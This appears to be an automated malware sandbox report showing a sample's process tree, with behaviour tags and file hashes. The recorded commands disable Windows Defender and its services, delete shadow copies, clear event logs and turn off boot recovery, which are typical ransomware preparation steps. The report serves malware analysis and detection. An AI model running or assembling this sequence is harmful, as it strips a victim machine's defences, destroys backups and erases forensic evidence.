C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:668
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1160
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:812
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1168
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1076
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1868
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1684
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1912
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1320
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:748
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1812
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:2020
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1484
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1704
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1532
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1708
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:524
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1824
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1820
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1924
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1324
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1216
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1556
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:552
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1460
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1404
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2044
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:976
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:368
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1800
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1012
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1668
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1648
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2008
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1100
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2012
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:572
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD57f70329813ed6ce71e407c9d4e27d6a1
SHA1daefe5f852ca651d6aa8643cfa53d353a0e7c03d
SHA25639d5a5cca716f47b43021dcf5789f0628fb483336f9fa53a1ae57f3d7bb5fd57
SHA5128fc0d89a550eeb3f0de39df3c21f0a7bfa1f5de9fc3a8a45880436d368d1b694e026a56b8b0364bc703491f8fa0e7a862eb2d001d03e498188cd147402cb7c8c